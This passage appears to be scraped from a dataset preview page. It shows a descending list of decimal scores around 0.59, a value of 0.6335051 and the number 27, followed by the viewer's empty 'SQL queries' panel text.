"0.59946156",
"0.59945714",
"0.59929407",
"0.5983412",
"0.59820914",
"0.5980993",
"0.598065",
"0.5976521",
"0.5975711",
"0.59732777",
"0.5969431",
"0.5969431",
"0.59650487",
"0.5963501",
"0.5963459",
"0.59625536",
"0.59620285",
"0.5960629",
"0.5959945",
"0.5959945",
"0.5959945",
"0.595743",
"0.5954696",
"0.5954696",
"0.5954528",
"0.5950277",
"0.59496915",
"0.594555",
"0.59440696"
] |
0.6335051
|
27
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.